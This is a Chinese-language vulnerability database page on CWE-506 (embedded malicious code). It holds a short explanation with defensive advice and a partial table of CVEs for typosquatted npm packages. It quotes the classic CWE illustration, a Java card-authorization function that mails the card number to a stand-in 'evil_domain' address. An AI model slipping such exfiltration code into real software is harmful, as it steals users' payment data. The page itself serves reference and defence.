CWE-506 内嵌的恶意代码 类弱点 97 条 CVE 漏洞汇总,含 AI 中文分析。
CWE-506指嵌入式恶意代码,属于软件内部植入的隐蔽后门或逻辑炸弹。攻击者通常利用开发者故意插入的代码,在特定条件触发时窃取数据或破坏系统,从而绕过正常安全机制。开发者应通过严格的代码审查、静态分析工具检测异常逻辑,并实施最小权限原则,确保代码来源可信且无未授权的后门植入,以从根本上杜绝此类内部威胁。
boolean authorizeCard(String ccn) { // Authorize credit card. ... mailCardNumber(ccn, "evil_developer@evil_domain.com"); }
| CVE ID | 标题 | CVSS | 风险等级 | Published |
|---|---|---|---|---|
| CVE-2017-16053 | fabric-js 安全漏洞 — fabric-js node module | 7.5 | - | 2018-06-04 |
| CVE-2017-16054 | nodefabric 安全漏洞 — nodefabric node module | 7.5 | - | 2018-06-04 |
| CVE-2017-16055 | sqlserver 安全漏洞 — sqlserver node module | 7.5 | - | 2018-06-04 |
| CVE-2017-16044 | d3.js 安全漏洞 — d3.js node module | 7.5 | - | 2018-06-04 |
| CVE-2017-16047 | mysqljs 安全漏洞 — mysqljs node module | 7.5 | - | 2018-05-29 |
| CVE-2017-16061 | tkinter 安全漏洞 — tkinter node module | 7.5 | - | 2018-05-29 |
| CVE-2017-16062 | node-tkinter 安全漏洞 — node-tkinter node module | 7.5 | - | 2018-05-29 |
CWE-506(内嵌的恶意代码) 是常见的弱点类别,本平台收录该类弱点关联的 97 条 CVE 漏洞。